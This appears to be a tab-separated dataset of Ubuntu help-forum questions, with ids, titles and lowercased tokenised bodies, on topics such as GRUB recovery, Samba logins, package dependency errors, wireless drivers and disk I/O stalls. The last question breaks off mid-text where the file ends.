398859	recovering grub after installing windows 7 with boot repair	recently i 've reinstalled the windows copy i had alongside ubuntu , and after that the grub menu disappeared and the computer starts off on windows automatically . the solution i found was to run boot repair , so i ran ubuntu from a cd , and then installed and ran boot repair , and it said the repair had been successful . however , the grub did n't reappear . this is the log i got after running boot repair : http : //paste.ubuntu.com/6677448/ thanks
398860	user ca n't access share	ubuntu server ( 12.04lts ) , simple file sharing server with samba ( 5 users ) . worked past 2-3 years as fine . clients use windows os . one client ca n't access sharing from past few weeks . ( reason from his end : username/password failure ) nobody made any change . when i reassign the old password to this user on server ( unix password with passwd ) , it started working again for 1-3 days . i checked for change etc . password never expired . what might be the problem ? thanks
398861	creating a new partition to store files	i just want to drag files to the drive and be done with it , i want it to be like a usb or external hard drive . completely separate from my main storage partition . i want to do this because i want to upgrade from 12.04 to 13.10 . i would like to make a clean install , to where all my current files are deleted , app data and all . i 'm afraid that if i try to restore the files when installing 13.10 , that some of the files would be missing or damaged . tell me , am i being too irrational and paranoid or what ? i have ubuntu installed on only one partition containing everything and i want to backup my personal files without the use of and external storage because i want to start a fresh new install of ubuntu .
398863	unable to install vlc or mpeg layer-1 decoder for rhythmbox	i just installed ubuntu 12.04 on my laptop and installed all required drivers . but when i launched rhythmbox player to play an .mp3 file , it threw the below error message : required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder to resolve this problem , i followed the steps mentioned in this link . how to play mp3 files using rhythmbox ? i enabled the multiverse repository and executed below command in terminal : sudo apt-get install ubuntu-restricted-extras after performing all steps , still facing same issue ... unable to play mp3 in rhythmbox or video files in movie player . in the some link , someone had mentioned that vlc does n't require any drivers to play audio and video files . so , thought to install vlc through ubuntu software centre . when i clicked install vlc it threw the below error message : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . please suggest some solution for the above problems .
398865	how to connect android phone internet with ubuntu	i am really disappointed..i have a rooted android phone ( 4.1 ) and ubuntu 12.04 laptop.my phone has internet and i wanted to connect it to laptop via wifi ( not usb tethering ) .i have searched a lot , finding no right answer..please help .
398869	no grub menu after 13.10 installation	i 've previously installed window 8 pro ( 64bit ) on lenovo ideapad z480 , then i installed ubuntu 13.10 ( 64bit ) on another partition . there 's no error triggered during installation but after installation , there 's no grub menu and directly boots into windows 8 . i 've tried on another acer laptop and everything 's fine . can you guys give me some help ?
398873	default login screen missing , how to revert ?	i installed some kde stuff by mistake . after removing it , my login screen now is quite different ; has a white background and the user icons+input appear in the centre . [ note that i have tried sudo dpkg-reconfigure lightdm ; amongst other things ] how do i revert back to the default ubuntu 13.10 x64 desktop one ?
398874	how to install ralink 3290 wireless adaptor in ubuntu 12.04	i 'm using ralink rt3290 wireless card in my ubuntu 12.04 lts running kernel version 3.5.0-23-generic i used the steps showed in the question here . it installed successfully but later on i got error kernel panic not syncing fatal exception in interrupt i found out that this is due to the wireless adaptor i installed i switched back to ethernet card and i did n't got that error again . now my question is how can i make my wireless card work in ubuntu 12.04 . will i have to update my kernel and how can i do that . thanks .
398875	ubuntu software center did not pay me ?	so , i believe usc should have paid me via paypal the 20.80 $ i earned by selling my game here ... . but i did not get anything ... help ? someone clarify me ?
398881	thunderbird mail activation	i can not find a possibility on the desktop to activate the pre-installed thunderbird mail within the ubuntu 13.04 installation
398884	toshiba t110 brightness control `` fn '' does n't work ( ubuntu 12.04 lts 32 bit )	i recently installed ubuntu 12.04 32 bit in my toshiba t110 laptop , and the brightness control does n't work . i have tried gedit /etc/default/grub , and have modified the `` quite splash '' to many suggestion that i have come across , like : '' quiet splash acpi_backlight=vendor '' and `` quiet splash acpi_osi=linux '' and `` quiet splash acpi_osi=linux acpi_backlight=vendor '' but nothing seems to work , i mean i can see the brightness indicator moving but the brightness is set to highest all the time , please help .
398887	no address associated with the host server	please help me with this . i am getting `` no address associated with the host name '' error when i run `` sudo apt-get update '' command from the console
398888	i ca n't see my bootable usb	i try to install ubuntu 12.04.3 in a sony vaio computer , but i can not choose to boot from a usb memory because it does not appears in the boot menu . can you help me ?
398900	what options do i have to increase the download speed of files ?	i want to download a 4 gb file which would take approximately 2 hours to finish at its current speed . however , i have a much faster connection capable of downloading it in a couple of minutes at full speed . what options do i have to increase the download speed of files ?
398901	how can i install ubuntu from one computer to other one ? ( in my computer there is no internet connection )	its very important because my pc uses windows xp and i want to get ubuntu ( latest version ) . i have tried installing it rom my computer , but for having wifi i must log in as the adminitrator , but i cant remember the password
398903	unknown display besides laptop built-in display . old question but with no answers	after my update from 12.04 to 13.10 my display configuration started showing an extra unknown monitor , even though i have nothing connected . lscpi : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 60.1 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) vga-2 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1024x768 ( 0x43 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x44 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x45 ) 36.0mhz h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz this problem seems to had been previously asked here and here . any ideas on how to solve this ?
398904	critical problem with ubuntu hard disk	getting below bug , what should i do ? very critical , unable to mount hdd , more details , http : //paste.ubuntu.com/6678256/
398905	iheartradio - looping for changed auth code	i have a bash script i 'm running that plays a station from iheartradio in the cli . i also use it to record a show in the early morning on my rasppi so i can listen later in the day . the script works fine , but the auth code from iheartradio changes every 5 to 10 minutes and the time frame changes randomly . somehow i have to get the script to detect this and change the url when it changes to keep the show running . my current code for live is : rtmpdump -- live -r $ ( wget -o - -q `` http : //p2.wspd-am.ccomrcdn.com/player/player_dispatcher.html ? section=radio & action=listen_live '' | sed -n `` s|.*primary_location=\ '' \ ( rtmp : // [ ^\ '' ] *\ ) \ '' . *|\1|p '' ) | mplayer -vo null -idle - and for saving rtmpdump -- live -r $ ( wget -o - -q `` http : //p2.wspd-am.ccomrcdn.com/player/player_dispatcher.html ? section=radio & action=listen_live '' | sed -n `` s|.*primary_location=\ '' \ ( rtmp : // [ ^\ '' ] *\ ) \ '' . *|\1|p '' ) > audio.aac the problem like i said is the changing primary_location which contains an auth code in it and it changes at random time intervals . how would i keep this updated best ? i thought about running the rtmpdump in the background & then running a while loop with a 30 second sleep to check the url . when the url changes kill the old process and re-spawn . but there has to be a better way to do this and more streamlined .
398907	is there any voice recognition software ( g.u.i ) for ubuntu destop ?	i will be glad if the response is positive .
398909	remove all lines that start with a hash from a list	for a simple example say i have list file which has the following contents cat dog pig dog hat cat clap sing king ca cat hog plate plate one two three cat i then have a 'pattern ' file . with the below content cat dog what i would like to happen is a new file is created from the list file but all lines that begin with cat or dog i not copied over . i have seen a few examples how this can work e.g . sed '/pattern to match/d ' ./infile > ./newfile from what i have gathered sed ca n't handle a 'pattern input file ' . is that a similar program to sed that could achieve what i would like to do ? if not could a make a program in python program that reads each line from the 'pattern ' file and run the sed command against th list file e.g . multiple passes with seds
398913	slow internet connection ubuntu 13.04 after steam install/uninstall	i have ubuntu 13.04 on my toshiba satellite z930 and until i installed steam it worked like a charm . when steam has been installed the problems started . the connection was really slow , sometimes it does not load anything at all . i uninstalled steam but the problem is still existing . i also tried the solutions from this site but nothing worked . what to try ?
398914	can not setup vm.dirty_writeback_centisecs and vm.laptop_mode	i have the same problem as descibed here ( which is not solved ) , please help . swappiness setting ignored in sysctl.conf i 'm trying to change default values of these three parameters : vm.dirty_writeback_centisecs vm.swappiness vm.laptop_mode i 've tried it as follows method 1 . editing /etc/sysctl.conf : vm.dirty_writeback_centisecs=6000 vm.swappiness=5 vm.laptop_mode=5 method 2 . creating a file named 60-ssd-opt.conf in /etc/sysctl.d/ with the same contents as in method 1 . this method is mentioned here changing swappiness in sysctl.conf does n't work for me and here swappiness setting ignored in systcl.conf method 3 . editing /etc/rc.local and adding lines : echo 6000 > /proc/sys/vm/dirty_writeback_centisecs echo 5 > /proc/sys/vm/swappiness echo 5 > /proc/sys/vm/laptop_mode method 4 . creating a script in /etc/init.d and make a link to it with name /etc/rc3.d/s99z_opt_ssd this method is mentioned here how to run a script in boot as root the only parameter successfully changed by applying these methods is 'swappiness ' . other two does n't set after reboot ( remains with default values ) . but when i do manually 'sysctl -p ' or commands as in method 3 these parameters successfully changing to desired values . so i think that something changes them back to defaults after my scripts are executed ( i 'm sure that rc.local is executed ) . how can i make script to execute as the very last step but still as root at boot time ? ubuntu version is 12.04.3 lts kernel is 3.2.0-57-generic # 87-ubuntu smp x86_64
398915	how to make emacs minibuffer vertical ?	i want to make the emacs minibuffer ( where we type emacs command ) vertical . just the way we open a window by using c-x 3 is there a way to do this ?
398919	ubuntu 12.04 get stucked on boot ( ubuntu logo + mouse cursor )	after running the latest update on my thinkpad running ubuntu 12.04 i got the kernel 3.5.0-44-generic . after rebooting , the system stucks at the `` ubuntu loading screen '' ( with the dots ) and shows the mouse cursor , which cant be moved . i use gnome 3 and autologin , but when i try to switch to another login ( via crtl+alt+f2 ) nothing happens as well . when i hit esc during boot , i see 2 messages that appear strange to me : * stopping gnome display manager [ ok ] * stopping save kernel messages [ ok ] ( no fail here ) i can start the recovery-mode . but how to fix this ... ?
398921	why my widget style always change back to gtk+ style automatically ?	using kde , when changing widget style using setting - > application appearance - > style - > application - > widget style every time i change the widget style into cleanlooks ( or others ) , the style of every window that is currently open changes immediately . but when i open new windows , the style of the newly open window become gtk+ style again . why ?
398922	subprocess error while installing xdman and oracle java8	sudo apt-get install xdman [ sudo ] password for xxxx : reading package lists ... done building dependency tree reading state information ... done xdman is already the newest version . the following packages were automatically installed and are no longer required : thunderbird-globalmenu gir1.2-ubuntuoneui-3.0 libavahi-ui-gtk3-0 guile-1.8-libs libgdu-gtk0 libubuntuoneui-3.0-1 librhythmbox-core5 libmusicbrainz3-6 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up oracle-java8-installer ( 8b108~precise~noobslab.com ) ... downloading oracle java 8 ... -- 2014-01-03 00:20:47 -- http : //www.java.net/download/jdk8/archive/b108/binaries/jdk-8-ea-bin-b108-linux-i586-19_sep_2013.tar.gz resolving www.java.net ( www.java.net ) ... failed : name or service not known . wget : unable to resolve host address `www.java.net' download failed oracle jdk 8 is not installed . dpkg : error processing oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xdman : xdman depends on oracle-java8-installer | oracle-java7-installer | oracle-java6-installer ; however : package oracle-java8-installer is not configured yet . package oracle-java7-installer is not installed . package oracle-java6-installer is not installed . dpkg : error processing xdman ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : oracle-java8-installer xdman e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am getting this error while installing xdman . please help me to resolve this .
398925	having arduino connect to my ubuntu server	i have an arduino client which reads rfid tags . i would like it to connect to my ubuntu server , get access to the database so as to allow or not allow permissions . how do i make the connection possible using the socket i have within the server . any ideas will be truly appreciated .
398927	duel boot problem windows 8 ubuntu 12.04	i successfully installed ubuntu 12.04 on a pre installed windows 8 laptop , but when i try to boot windows 8 i receive next problem : error : secure boot forbids loading module from ( hd0 , gpt6 ) /boot/grup/ntfs.mod error : no such device : febe18858be186605 , error : unknown command 'drivemap' error : invalid efi file path . press any key to continue ... i can only boot windows 8 properly when i use f12 and choose the special windows 8 boot manager . can somebody help me to solve this problem thanks
398929	unable to load shared object wrong elf class : elfclass32	i have a linux server with x86_64 . i 'm compiling an r code that needs to load a bibliblioteca . when i run this code it displays the following error has error in dyn.load ( `` functions.so '' ) : unable to load shared object 'functions.so ' : 'functions.so ' : wrong elf class : elfclass32 could anyone help , have spent several hours and still not found the solution .
398931	lubuntu 13.10 no monitor signal after logout/restart ?	i 'm running lubuntu 13.10 64bit . when i logout or do a restart my monitor receives no signal . each time i have to turn the pc off and on again to get a signal . i have tried a different monitor to eliminate a faulty monitor but it still did the same . does anyone have any ideas or can point me in the right direction to resolve this ?
398933	how do i enable my keyboard ?	three days ago , i pressed five time times the shift or `` bloq mayus '' key , then , there was a message on screen that a did n't read well and i pressed deactivate , after that , my keyboard do n't works , also i ca n't write ( now i 'm on win ) , i use ubuntu 13.10 and when i go to settings i ca n't find any option to resolve this .
398934	dual screen : set screen where windows will appear	i 'm using ubuntu 12.04 and have a little problem . i use a dual screen solution with different resolutions ( laptop + other screen , let 's call it aoc ) and found something quite disturbing . i do n't use mirror displays and i have found that whenever i put the launcher on one screen , when i launch a software from the launcher , it goes to the other screen . so if launcher is on laptop , when i launch something , it opens on aoc . i have to say that i was expecting the contrary which is way more convenient . i tried using xrandr and setting the laptop display to primary with it , but no luck with that . any ideas ? thanks in advance , laurent .
398939	problem printing from hp deksjet d2666	i use ubuntu 13.10 and use hp deksjet d2666 printer but only tri colour cartridge work well , so i ca n't print in black , what should i do to activate the black cartridge ? thank you for the answer ...
398941	find which tty device connected over usb	i am doing android development . the adb ppp command to switch back to the usb cable instead of tcp/ip says it needs the tty as a parameter . i have googled for this and found lots of references to solutions that do n't work . a lot of those point to ttyusb0 , which does n't seem to exist on my system . i am running ubuntu desktop 12.04 . how can i find my tty for my android phone ? thanks .
398943	connect owncloud to ubuntu one	is it possible to connect owncloud to ubuntu one over the `` external storage support '' app in owncloud . it works pretty well with dropbox and google drive .
398944	connecting a midi synthetiser	i recently got an old second-hand yamaha psr-350 synthesizer keyboard . i do n't have any trouble playing , but i would like to make use of the midi function . there are 2 midi ports , midi-in and midi-out . i bought a midi-usb interface and tried to connect it to my laptop but i ca n't seem to find how it works . what i would like to do is for example to write sheet music in musescore with my keyboard . here is a screenshot of qjackctl : image how can i make it work ?
398948	default resource cap on root user	i happened to see that on my ubuntu 12.04 some resources of the root user is capped . i have not capped anything explicitly and my limits.conf as far as root user is concerned is empty . here is the output of the ulimit -a on the root user core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 95931 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) 95931 virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited so i believe it is a default capping . so my question is what is the reason behind capping these resources of the root user by default ? now when i try to set the file limit to unlimited as root user by using the below command , i get an operation not permitted error . ulimit -h -n unlimited what prevents me from setting the limit to infinity and how safe it is to set it to infinity ?
398949	vlc player installation library errors	these are comes when install form ubuntu software center plz help what wrong depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.9ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.5 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.5 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.5 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed in terminal zubair @ zubair-optiplex-gx520 : ~ $ sudo apt-get install vlc [ sudo ] password for zubair : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8-0ubuntu0.12.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . please help how to slove and install vlc player
398950	how to enable openssl for php cli ?	there is no major difference in the php.ini files located at /etc/php5/apache2/php.ini and /etc/php5/cli/php.ini . but < ? php phpinfo ( ) ; ? > when accessed from a browser says openssl support enabled whereas php -info | grep openssl executed in a terminal gives openssl support = > disabled ( install ext/openssl ) . i have the latest versions of libssl-dev and openssl installed . how to enable openssl for cli version ?
398951	my computer will connect to wireless networks for awhile and then stop	i am running ubuntu 13.10 on an hp laptop . the issue is that i will connect to wireless networks great for a few days . then the computer will stop connecting almost as if it has forgotten how . i can still connect to the internet via a wired connection however that is inconvenient . i downloaded an earlier version of ubuntu then this happened . then , i reloaded that version and several others and all run into the same issue . any advice on what i could do ? i know my hardware is working properly , but maybe my router is n't talking well with my laptop . any suggestions would be appreciated . thanks .
398953	ubuntu center ratings and how to submit them	i would like to rate the devede package as its buggy and deserves a low rating , plus i can tell people what they have to do to make it work . i tried running the command , software-center devede , but ratings or submitting ratings is not available . i have software-center version 5.2.9 running on ubuntu 12.04 on two different machines my issue with devede is that it changes the imported movie size without updating the disk usage in the main window . disk usage seems to indicate the input files , not the files to be written . adding a video file to a title automatically changes the output size of the input even if you select do n't do that . you must manually change the output video and audio frequencies to match the input in order to not change them . selecting optimize to fit disk on the main window errors out . very frustrating to spend 3 hours creating a 9gb iso image when the dvd will only hold 4.7gb with no indication that this is what devede is doing . takes a long time and numerous tries to find these types of problems . ( many evenings ) . which is why i think the current rating of 4.3 is wrong and i'ld like to submit mine ... now if i could figure out why the titles are invisible on the bluray player , and why the iso file will not play in vlc , i 'll have a decent way to move my old 8mm tapes to dvd . if we can not input ratings then i would n't trust them as i do n't know where they came from .
398955	ssh stopped working	i restarted my computer , and now i ca n't connect to it through ssh on my remote machine . i can connect to it through the host machine , but that 's it . it says ssh is running , but i ca n't connect from another computer .
398958	when i open wubi.exe for installing edubuntu it again downloads the edubuntu-13.10-dvd-i386 .iso file.why does this happen ?	i downloaded the edubuntu-13.10-dvd-i386.iso file from bittorent and installed it on my pendrive using uui . then i went to the drive and opened wubi.exe , and i clicked on install . the window showed that edubuntu-13.10-dvd-i386.iso was downloading . why is it downloading again ?
398961	plex media server and mount issues in ubuntu 13.04	hopefully it 's not too much of a newbie question ... ... so , i have decided to drop plex media server onto an ubuntu install in order to provide my house with a stable platform that will maximize availability . i had considered setting up an old winxp machine to do this , but figured that i would get the most out of older hardware on ubuntu , and that it would make full use of all the ram as it 's a 64bit os instead of 32bit . that being said , i 'm having some issues . my machine is currently an older : 13.04 64bit . amd2.7 dual core w/ 8gb ram my linux knowledge is pedestrian at best , but i do have some command line experience . my question is thus ... ... i have finally moved all my media over from a windows 7 mce machine that we were using , but was slowing down tremendously . apparently plex does not support sub folders and i had to redo my directory structure again , as i want to separate my video files into kid friendly categories ( same with my music files ) . because of this , i used gparted to create several different logical volumes that will be mounted independently from one another , and allow me to create different repositories within plex , that our kids now they can access . i know that the naming convention of the media ( movies , tv progs , music , etc ) must be adjusted so that plex can find them . however , i have done some reading and have found that this is probably not the only issue that i may be having . i have read other threads that indicate that the permissions on the volumes need to be 777 in order to allow plex to access them , or plex needs to be added to my default usergroup . this is not a concern , as i am probably going to be the only one accessing anything on the server , and i am comfortable with chmod -r enough to have fixed that . additionally though , i read that the volumes are mounted with a default /media mountpoint and that this is the real underlying problem . i read that the mountpoint needs to be changed to /mnt . in order to do this , it would appear as though i need to edit /etc/fstab in order to change the mountpoints . i found this guide : movemountpointhowto - community ubuntu documentation my question is after moving all my files into my directories and having them mount at /media , should i back the files out in order to change the mount point ? or perhaps a better way to phrase it , will my data still be in the partition after i change the mountpoint or will it be lost ? another set of questions , is this even necessary ? is there an easier way to change the mountpoint ? while i am somewhat ok w/ using the command line , i would prefer a gui option as my linux-fu is far outdated . alas , i have been unable to find anything that is reliable and all the posts i have read is that editing the /etc/fstab is `` easy '' . i 'm afraid that the `` how to '' article referenced above is something that i 'm not 100 % comfortable with , although it appears to be very well written . thank you in advance for any input/feedback/assistance !
398964	playonlinux can not find wine ( though it is installed with pol )	really strange , i use playonlinux ( pol ) to install wine 1.7.9 , i rebooted my pc and when i try to open pol it says it ca n't find wine , although it 's listed under installed wine versions . what do ? also , my terminal does n't recognize the wine command . faulty install ? if so , how do i fix it ?
398966	how to return the login screen of the original unity ubuntu ?	i 've installed the lightdm gtk+ greeter 1.7.0 as below sudo add-apt-repository ppa : lightdm-gtk-greeter-team/stable sudo apt-get update sudo apt-get install lightdm-gtk-greeter ( http : //www.smdavis.us/2013/12/28/lightdm-gtk-greeter-1-7-0-released/ ? utm_source=rss & utm_medium=rss & utm_campaign=lightdm-gtk-greeter-1-7-0-released & utm_reader=feedly ) now i want to return to the original login screen of unity ubuntu . please show me a way . tasks done but have no result : sudo ppa-purge ppa : lightdm-gtk-greeter-team/stable . sudo apt-fast remove lightdm-gtk-greeter sudo apt-fast install -- reinstall lightdm .
398969	what is the difference between `` save as '' and `` save a copy '' ?	programs like libreoffice and pdf readers sometimes need to open a file ( say , the user downloaded and opened a file from firefox ) as read-only . when that is the case , and the user wants to save the file for later , the user has the option to save as ... or save a copy . why is save a copy included if save as ... would do the exact same thing ?
398973	what are the top video and audio converting software available for linux ?	what is important is the functionality of the software simply the software should recognize as much formats as possible . it should contain lots and lots of conversion options ; which basically means that i can convert to as much file types as possible . and of course its bugs should be little in number and trivial . it should have strong support from the community . it 's preferable that it would have a good and easy to use gui . i do n't prefer a software that can deal with both audio and video . i prefer 2 software where each is specified for a certain job . i use the windows programs avs audio and video converters . i need linux software that are as powerful as those . upto this moment i switch back to windows so that i can convert my media .
398980	system very slow except while running smartmontools selftest	i am quite new to ubuntu . i have a l430 lenovo with i5-3210m cpu @ 2.50ghz × 4 , 4gb ram , dual boot with windows 7 . hdd 500 gb toshiba mk5061gsy . every 10/15 seconds the hdd light turns on for 2-3 seconds , and everything is frozen , including inputs from keyboard , switch windows , etc . [ the same problem occurred to me under windows7 , and in fact it led me to try with ubuntu to see if it was a windows issue - obviously it was not ] this corresponds to the following 99.99 % i/o i observe from : $ sudo iotop -qtoqq 11:45:03 282 be/3 root 0.00 b/s 27.44 k/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:45:03 2175 be/4 simone 0.00 b/s 3.92 k/s 0.00 % 0.12 % firefox 11:45:04 2234 be/4 simone 0.00 b/s 11.65 k/s 0.00 % 0.00 % gnome-terminal 11:45:09 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:45:11 282 be/3 root 0.00 b/s 35.01 k/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:45:11 2234 be/4 simone 0.00 b/s 7.78 k/s 0.00 % 99.99 % gnome-terminal 11:45:11 563 be/4 syslog 0.00 b/s 3.89 k/s 0.00 % 0.00 % rsyslogd -c5 i tried to check the disk with smartmontools , and while the results - as far as i could understand - did not indicate a possible source of the problem , but when i launched the `` long '' test $ sudo smartctl -t long /dev/sda smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.8.0-34-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net with great surprise i noticed that while the test was running the problem was disappeared ! after less than one minute every 99.99 % value disappears from > iotop output , the hdd light flashes only very briefly – no problems , i finally can work at last with my computer ! $ sudo iotop -qtoqq 11:46:42 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:46:44 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 3.84 % [ jbd2/sda5-8 ] 11:46:45 282 be/3 root 0.00 b/s 15.63 k/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:46:49 2175 be/4 simone 0.00 b/s 3.91 k/s 0.00 % 5.76 % firefox 11:46:49 2200 be/4 simone 0.00 b/s 109.47 k/s 0.00 % 0.00 % firefox 11:46:49 2220 be/4 simone 0.00 b/s 62.56 k/s 0.00 % 0.00 % firefox 11:46:55 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:47:00 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:47:00 2234 be/4 simone 0.00 b/s 7.79 k/s 0.00 % 0.26 % gnome-terminal 11:47:28 282 be/3 root 0.00 b/s 43.06 k/s 0.00 % 99.99 % [ jbd2/sda5-8 ] 11:47:28 563 be/4 syslog 0.00 b/s 3.91 k/s 0.00 % 0.00 % rsyslogd -c5 11:47:28 2175 be/4 simone 0.00 b/s 7.83 k/s 0.00 % 0.00 % firefox 11:47:29 2234 be/4 simone 0.00 b/s 7.76 k/s 0.00 % 0.00 % gnome-terminal 11:47:31 282 be/3 root 0.00 b/s 7.81 k/s 0.00 % 2.68 % [ jbd2/sda5-8 ] 11:47:31 2175 be/4 simone 0.00 b/s 3.91 k/s 0.00 % 2.18 % firefox 11:47:32 2220 be/4 simone 0.00 b/s 62.18 k/s 0.00 % 0.00 % firefox 11:47:36 924 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.77 % [ flush-8:0 ] > 11:47:37 282 be/3 root 0.00 b/s 31.24 k/s 0.00 % 4.88 % [ jbd2/sda5-8 ] 11:47:37 2234 be/4 simone 0.00 b/s 7.81 k/s 0.00 % 0.00 % gnome-terminal 11:47:41 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 1.43 % [ jbd2/sda5-8 ] 11:47:42 282 be/3 root 0.00 b/s 0.00 b/s 0.00 % 7.86 % [ jbd2/sda5-8 ] 11:47:42 2234 be/4 simone 0.00 b/s 7.80 k/s 0.00 % 0.00 % gnome-terminal 11:47:46 282 be/3 root 0.00 b/s 3.90 k/s 0.00 % 4.88 % [ jbd2/sda5-8 ] 11:47:47 2234 be/4 simone 0.00 b/s 7.77 k/s 0.00 % 0.00 % gnome-terminal 11:47:53 282 be/3 root 0.00 b/s 3.89 k/s 0.00 % 3.40 % [ jbd2/sda5-8 ] conversely , unfortunately , shortly after the end of the test ( 2 hours approximately ) the problem reoccurred : ( creating a job which launches the test when booting and then every 2 hours is surely not the best option . any suggestion ? thank you very much in advance ! please note that i tried also to change the powermanagement behavior , but i did not observe any change : sudo hdparm -b128 /dev/sda * [ which was the defalut value ] * sudo hdparm -b1 /dev/sda sudo hdparm -b254 /dev/sda sudo hdparm -b254 /dev/sda neither i did observe any impact of hd temperature , often around 47c the results of the test were the following : $ sudo smartctl -l selftest /dev/sda smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.8.0-34-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of read smart data section === > smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline aborted by host 90 % 1859 - # 2 extended offline completed without error 00 % 1849 - # 3 extended offline completed without error 00 % 1834 - # 4 vendor ( 0x50 ) aborted by host 90 % 1831 - # 5 short offline completed without error 00 % 1831 - # 6 extended offline aborted by host 10 % 1830 - # 7 extended offline completed without error 00 % 1803 - # 8 extended offline completed without error 00 % 1693 - # 9 short offline completed without error 00 % 1690 - # 10 short offline completed without error 00 % 1636 - # 11 vendor ( 0x50 ) completed without error 00 % 929 - # 12 short offline completed without error 00 % 928 - # 13 vendor ( 0x50 ) completed without error 00 % 792 - # 14 short offline completed without error 00 % 792 - # 15 vendor ( 0x50 ) completed without error 00 % 791 - # 16 short offline completed without error 00 % 791 - # 17 short offline aborted by host 90 % 790 - # 18 vendor ( 0x50 ) completed without error 00 % 134 - # 19 short offline completed without error 00 % 134 - # 20 short offline aborted by host 80 % 28 - # 21 vendor ( 0x50 ) completed without error 00 % 0 - and what i get from sudo smartctl -d ata -a /dev/sda is : smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.8.0-34-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : 